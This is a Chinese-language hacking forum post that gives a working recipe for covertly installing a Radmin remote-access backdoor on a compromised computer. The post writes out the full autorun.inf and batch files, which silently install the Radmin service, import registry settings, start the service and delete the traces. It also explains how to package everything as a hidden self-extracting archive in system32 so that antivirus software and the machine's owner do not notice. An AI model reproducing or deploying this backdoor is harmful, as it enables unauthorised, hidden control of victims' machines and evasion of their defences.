〓圣骑士--网络安全技术中心〓

这里只需要你有上传的权限。一共三个文件：1.Autorun.inf、2.Shell.bat、3.Hao.exe(自解压文件）。思路：全部放在C盘下。当肉鸡主人双击C盘时自动运行第一文件，第一文件带动运行第二文件，同时第二运行第三运行完可正常进入C盘。不会让人发觉。并且里面所带的批处理，会在最后把所有文件删除。此时，后门却已经装上去了（此法针对没有权限运行木马的入侵活动）。制作： [autorun] open=shell.bat，这个是autorun.inf @echo off hao.exe c:\windows\explorer c:\ del autorun.inf del rad.exe del shell.ba，这个是shell.bat hao.exe，里面包含admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五个文件（关键所在）r.bat——批处理做法 @echo off @pchealthy.exe /install /silence @regedit /s admin.reg @net start r_server @del admin.reg @del r.bat，其他四个就是Radmin的文件。这个大家都会，复制过来就行。我们再来看自解压的处理。在解压路径里我们用 %systemroot%\system32，就是解压到系统目录里，并且“解压后运行”填上我们的r.bat文件。因为这里的文件比较多，比较隐蔽。解压模式我们选 “全部隐藏”，和 “覆盖所有文件”！好了，一个不被杀毒软件所能查杀的好后门程序就成功制作出来了！大家不要放在文件夹里压缩哦，要直接选上admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五个文件压缩，这样就行啦。

查看人数：1063

设为首页┋收藏本站┋广告合作┋联系我们┋友情链接

本站页面刷新量: 4528443 人次 ┋ 最高峰: 2009-3-10 22:05:47 7897人在线现有 33人在线 [网站于 2006-4-1 0:0:0开放统计]

〓圣骑士--网络安全技术中心〓 [Ver 6.1.0]